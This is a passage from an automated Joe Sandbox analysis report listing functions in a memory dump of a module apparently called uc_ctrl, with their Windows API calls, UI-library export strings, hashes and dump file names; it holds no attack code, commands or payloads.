Instruction Fuzzy Hash: 3CF05435B817D917EF203A384D05BBB5974AF47F5DF041524E54EFA5C1CB54D4015171

Function 6CC626D3 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,6CC626A9,?,6CD216A0,0000000C,6CC627DC,00000000,00000000,00000001,6CC519F9,6CD21390,0000000C,6CC518A2,?), ref: 6CC626F4
TerminateProcess.KERNEL32(00000000,?,6CC626A9,?,6CD216A0,0000000C,6CC627DC,00000000,00000000,00000001,6CC519F9,6CD21390,0000000C,6CC518A2,?), ref: 6CC626FB
ExitProcess.KERNEL32 ref: 6CC6270D

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: c422b55e7f119a0a4cb4a273c69f35ece5c51846e4e87d3376e574d1cfe372da
Instruction ID: 47b759939ec20bf43ac2b03e46f9b91dba9aeed3d36db0531a3a6a492b7d2472
Opcode Fuzzy Hash: c422b55e7f119a0a4cb4a273c69f35ece5c51846e4e87d3376e574d1cfe372da
Instruction Fuzzy Hash: ECE04631215108ABCF016F16CA8CE89BF79FF42389B144014FC058B922EB36E886CB80

Function 6CB12940 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?RemoveBindTabIndex@COptionUI@UiLib@@QAEXXZ,00000000,00000000), ref: 6CB1294B

Strings

?RemoveBindTabIndex@COptionUI@UiLib@@QAEXXZ, xrefs: 6CB12944

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Message
String ID: ?RemoveBindTabIndex@COptionUI@UiLib@@QAEXXZ
API String ID: 2030045667-165758850
Opcode ID: 51bc77adb0a4aa4b2feb29cc21b9229d723b4ca5ce479b2b1e408be5794d80c0
Instruction ID: cb63415c6268c0e7dae7753d2cb8fa59bb7fec3beda10adbc4a1942f89b3d1c2
Opcode Fuzzy Hash: 51bc77adb0a4aa4b2feb29cc21b9229d723b4ca5ce479b2b1e408be5794d80c0
Instruction Fuzzy Hash: 0AB01230388200EEFA941B548C16F013530FB02B42F101010F3006C0C492B014004604

Function 6CB070E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?BindTabIndex@COptionUI@UiLib@@QAEXH@Z,00000000,00000000), ref: 6CB070EB

Strings

?BindTabIndex@COptionUI@UiLib@@QAEXH@Z, xrefs: 6CB070E4

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Message
String ID: ?BindTabIndex@COptionUI@UiLib@@QAEXH@Z
API String ID: 2030045667-1726641424
Opcode ID: a84b1e34217af534de9e3572c168a493e9a41489fc31fa6c3e7de762280bda56
Instruction ID: 6af55b11e18fa17468eea69d84c5260fb54ae328acceeb1bb646f770fd77c2d0
Opcode Fuzzy Hash: a84b1e34217af534de9e3572c168a493e9a41489fc31fa6c3e7de762280bda56
Instruction Fuzzy Hash: 90B01230388240EAF5501B884C06F0135307303B12F140060F3012E5C052B038004618

Function 6CB07120 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?BindTriggerTabSel@COptionUI@UiLib@@QAEXH@Z,00000000,00000000), ref: 6CB0712B

Strings

?BindTriggerTabSel@COptionUI@UiLib@@QAEXH@Z, xrefs: 6CB07124

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Message
String ID: ?BindTriggerTabSel@COptionUI@UiLib@@QAEXH@Z
API String ID: 2030045667-2010728713
Opcode ID: a488430835648075c545d65b6879c43122027c85de84b9c1b3c45b57a8dfc70c
Instruction ID: c483ee70d450fe575aac5f254729331e3d22b4f1c2cbfcd9367e0c720cbe995a
Opcode Fuzzy Hash: a488430835648075c545d65b6879c43122027c85de84b9c1b3c45b57a8dfc70c
Instruction Fuzzy Hash: A8B012303C8200F6F5901A084C06F0136307313B43F180020F7012A4C052B424004545

Function 6CB07100 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?BindTabLayoutName@COptionUI@UiLib@@QAEXPB_W@Z,00000000,00000000), ref: 6CB0710B

Strings

?BindTabLayoutName@COptionUI@UiLib@@QAEXPB_W@Z, xrefs: 6CB07104

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Message
String ID: ?BindTabLayoutName@COptionUI@UiLib@@QAEXPB_W@Z
API String ID: 2030045667-3982763456
Opcode ID: 99a7fb6b6c20c41837e2ce438641c342f2eb96b90a0b2847d0c295f4b538b663
Instruction ID: 7cc653ff44d5d0dddedc43f92493ff24cb95a4d9b70006dee020562e5a7d6a76
Opcode Fuzzy Hash: 99a7fb6b6c20c41837e2ce438641c342f2eb96b90a0b2847d0c295f4b538b663
Instruction Fuzzy Hash: DDB002313C9344F7F5541E585C0AF1636347717F93F545460F3056A5D456B464144555

Function 6CB07140 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?BindUnionButton@CButtonUI@UiLib@@QAEXPAV12@_N1@Z,00000000,00000000), ref: 6CB0714B

Strings

?BindUnionButton@CButtonUI@UiLib@@QAEXPAV12@_N1@Z, xrefs: 6CB07144

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Message
String ID: ?BindUnionButton@CButtonUI@UiLib@@QAEXPAV12@_N1@Z
API String ID: 2030045667-1207669573
Opcode ID: c822792c5e44875b45e8726b7fe536c084637da6b726fd19e81f2a4ce39abc9b
Instruction ID: b14e8389f0ec56aef35fc9dd03a11e9263efd540b3fda3bbb78c35cfab49e89d
Opcode Fuzzy Hash: c822792c5e44875b45e8726b7fe536c084637da6b726fd19e81f2a4ce39abc9b
Instruction Fuzzy Hash: 3AB01230388300E6F5601A084C06F0135307303B42F180060F3052A4C052B028044914

Function 6CB08200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?Download@CWebBrowserUI@UiLib@@UAGJPAUIMoniker@@PAUIBindCtx@@KJPAU_tagBINDINFO@@PB_W3I@Z,00000000,00000000), ref: 6CB0820B

Strings

?Download@CWebBrowserUI@UiLib@@UAGJPAUIMoniker@@PAUIBindCtx@@KJPAU_tagBINDINFO@@PB_W3I@Z, xrefs: 6CB08204

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Message
String ID: ?Download@CWebBrowserUI@UiLib@@UAGJPAUIMoniker@@PAUIBindCtx@@KJPAU_tagBINDINFO@@PB_W3I@Z
API String ID: 2030045667-2577653666
Opcode ID: c52892eeec95523f50c0646fbcdc0531b9d70e536afc54ac99470791da97d261
Instruction ID: 9b7ecf2e723506cf5bb9774cc77c05d7adc3b048dea95d07c6f7db8807846115
Opcode Fuzzy Hash: c52892eeec95523f50c0646fbcdc0531b9d70e536afc54ac99470791da97d261
Instruction Fuzzy Hash: 4EB00234789204E6F5542E544C1AF053534B707B53F541850F305695C5A6B464104A59

Function 6CB09FA0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?GetClipboardData@COleObject@UiLib@@UAGJKPAPAUIDataObject@@@Z,00000000,00000000), ref: 6CB09FAB

Strings

?GetClipboardData@COleObject@UiLib@@UAGJKPAPAUIDataObject@@@Z, xrefs: 6CB09FA4

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Message
String ID: ?GetClipboardData@COleObject@UiLib@@UAGJKPAPAUIDataObject@@@Z
API String ID: 2030045667-3217993851
Opcode ID: e753ee558ab80e2f3f8da0188efbec54ae087916cc7cd50636a64aee1d597a58
Instruction ID: f415f89284fc393fc58a62735ff949c4a22ac36a7d90dd01ceed7e55e2bf6917
Opcode Fuzzy Hash: e753ee558ab80e2f3f8da0188efbec54ae087916cc7cd50636a64aee1d597a58
Instruction Fuzzy Hash: 09B002313C9205E6F5545B584D06F0535347B37B53F641491F305795C566B459104555

Function 6CB09420 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?GetBindTabLayoutIndex@COptionUI@UiLib@@QAEHXZ,00000000,00000000), ref: 6CB0942B

Strings

?GetBindTabLayoutIndex@COptionUI@UiLib@@QAEHXZ, xrefs: 6CB09424

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Message
String ID: ?GetBindTabLayoutIndex@COptionUI@UiLib@@QAEHXZ
API String ID: 2030045667-738126606
Opcode ID: a3f44343692eaebe75c71eade3ee2978a31c7e62a1046be6ba1a506788d5d66b
Instruction ID: a31667c8ccd5083e85ff98321c45176188c0865752248f18e428de0715d66115
Opcode Fuzzy Hash: a3f44343692eaebe75c71eade3ee2978a31c7e62a1046be6ba1a506788d5d66b
Instruction Fuzzy Hash: 48B012303C8200EAF5642A044D06F0139347303B03F141010F300284C572B014104705

Function 6CB09440 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?GetBindTabLayoutName@COptionUI@UiLib@@QAE?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@XZ,00000000,00000000), ref: 6CB0944B

Strings

?GetBindTabLayoutName@COptionUI@UiLib@@QAE?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@XZ, xrefs: 6CB09444

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Message
String ID: ?GetBindTabLayoutName@COptionUI@UiLib@@QAE?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@XZ
API String ID: 2030045667-3000351920
Opcode ID: 7f4d2910498f15ec8b83c071b56fe2b9ba482db26d3115ae964ea35e8ed07a4c
Instruction ID: 6ba872a94993255fa425b6fd81a89da71a330a07227fe82cb6c3a9580e43b21e
Opcode Fuzzy Hash: 7f4d2910498f15ec8b83c071b56fe2b9ba482db26d3115ae964ea35e8ed07a4c
Instruction Fuzzy Hash: 09B01230388200E6F5601B044C06F0035347303B02F140450F300284C4A2B024404618

Function 6CB2B15E Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 6CB2B16A

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Iconic
String ID:
API String ID: 110040809-0
Opcode ID: f15a9b4658263f463ae659b67230d06b905b6dd7f1f8d528d8e128372aadd49f
Instruction ID: 63f910039f0327d87a5d1aa1098b65a6baaa7ec0486fe3e90bf6a7410915a3dc
Opcode Fuzzy Hash: f15a9b4658263f463ae659b67230d06b905b6dd7f1f8d528d8e128372aadd49f
Instruction Fuzzy Hash: 45D012311657F0CBC7115A26E814BE377B4FB063AAB04052DD04783CF0EBB89880D740

Function 6CAFFF83 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 43registrywindowCOMMON

Download Yara Rule

APIs

RegisterWindowMessageW.USER32(Native), ref: 6CC51100
RegisterWindowMessageW.USER32(OwnerLink), ref: 6CC5110D
RegisterWindowMessageW.USER32(ObjectLink), ref: 6CC5111B
RegisterWindowMessageW.USER32(Embedded Object), ref: 6CC51129
RegisterWindowMessageW.USER32(Embed Source), ref: 6CC51137
RegisterWindowMessageW.USER32(Link Source), ref: 6CC51145
RegisterWindowMessageW.USER32(Object Descriptor), ref: 6CC51153
RegisterWindowMessageW.USER32(Link Source Descriptor), ref: 6CC51161
RegisterWindowMessageW.USER32(FileName), ref: 6CC5116F
RegisterWindowMessageW.USER32(FileNameW), ref: 6CC5117D
RegisterWindowMessageW.USER32(Rich Text Format), ref: 6CC5118B
RegisterWindowMessageW.USER32(RichEdit Text and Objects), ref: 6CC51199

Strings

RichEdit Text and Objects, xrefs: 6CC51191
Object Descriptor, xrefs: 6CC5114B
Link Source Descriptor, xrefs: 6CC51159
Embed Source, xrefs: 6CC5112F
Embedded Object, xrefs: 6CC51121
FileNameW, xrefs: 6CC51175
OwnerLink, xrefs: 6CC51106
ObjectLink, xrefs: 6CC51113
Link Source, xrefs: 6CC5113D
FileName, xrefs: 6CC51167
Native, xrefs: 6CC510F9
Rich Text Format, xrefs: 6CC51183

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: MessageRegisterWindow
String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
API String ID: 1814269913-2889995556
Opcode ID: cbbcd7c6f089b039eb1978cf3a1034a632f884c82f50ae4e309cc1bab1b94541
Instruction ID: 1de1ca44c934d3db6452b3996a0d47de85d273840fee6184265e07721556a605
Opcode Fuzzy Hash: cbbcd7c6f089b039eb1978cf3a1034a632f884c82f50ae4e309cc1bab1b94541
Instruction Fuzzy Hash: 181117B1E02742AFCF245FF59A0D456BEB0FA4A7123545D19A186E7A10E734D442CF48

Function 6CB8C42C Relevance: 40.8, APIs: 27, Instructions: 337COMMON

Download Yara Rule

APIs

Part of subcall function 6CB2D5E0: GetWindowLongW.USER32(?,000000EC), ref: 6CB2D5ED

GetClientRect.USER32(?,?), ref: 6CB8C49C
CopyRect.USER32(00000000,?), ref: 6CB8C4C9

Part of subcall function 6CB2617E: ScreenToClient.USER32(?,?), ref: 6CB2618D
Part of subcall function 6CB2617E: ScreenToClient.USER32(?,?), ref: 6CB2619A

IntersectRect.USER32(?,00000000,?), ref: 6CB8C515
SetRectEmpty.USER32(?), ref: 6CB8C523
IntersectRect.USER32(?,00000000,?), ref: 6CB8C555
SetRectEmpty.USER32(?), ref: 6CB8C563
IsRectEmpty.USER32(?), ref: 6CB8C56D
IsRectEmpty.USER32(?), ref: 6CB8C57B
GetWindowRect.USER32(?,?), ref: 6CB8C59E
GetWindowRect.USER32(?,00000000), ref: 6CB8C5C5
UnionRect.USER32(?,?,00000000), ref: 6CB8C5E3
EqualRect.USER32(?,00000000), ref: 6CB8C5F1
GetWindowRect.USER32(?,?), ref: 6CB8C685
IsRectEmpty.USER32(?), ref: 6CB8C6E9
MapWindowPoints.USER32(?,?,?,00000002), ref: 6CB8C708
RedrawWindow.USER32(?,?,00000000,00000185), ref: 6CB8C71F
IsRectEmpty.USER32(?), ref: 6CB8C736
EqualRect.USER32(?,?), ref: 6CB8C748
MapWindowPoints.USER32(?,?,?,00000002), ref: 6CB8C767
RedrawWindow.USER32(?,?,00000000,00000185), ref: 6CB8C77E
UpdateWindow.USER32(?), ref: 6CB8C78D
IsRectEmpty.USER32(?), ref: 6CB8C7D5
InvalidateRect.USER32(?,?,00000001), ref: 6CB8C7E8
IsRectEmpty.USER32(?), ref: 6CB8C7F2
EqualRect.USER32(?,?), ref: 6CB8C804
InvalidateRect.USER32(?,?,00000001), ref: 6CB8C817
UpdateWindow.USER32(?), ref: 6CB8C820

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
